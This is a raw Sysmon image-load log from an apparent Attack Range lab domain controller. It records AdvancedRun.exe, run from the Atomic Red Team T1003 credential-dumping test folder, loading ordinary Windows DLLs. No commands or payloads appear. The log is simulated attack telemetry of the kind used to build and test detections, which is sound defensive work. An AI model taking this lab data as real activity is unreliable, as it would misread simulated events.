17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943731Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943730Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943729Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943728Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943727Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943726Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943725Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943724Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943723Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943722Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943721Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943720Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943719Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943718Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943717Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943715Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943714Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943713Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943712Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943711Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943710Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943709Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943708Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943707Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943706Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943705Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943703Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943701Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.105{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943700Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943699Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943698Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943697Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943696Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943692Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.090{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003943687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 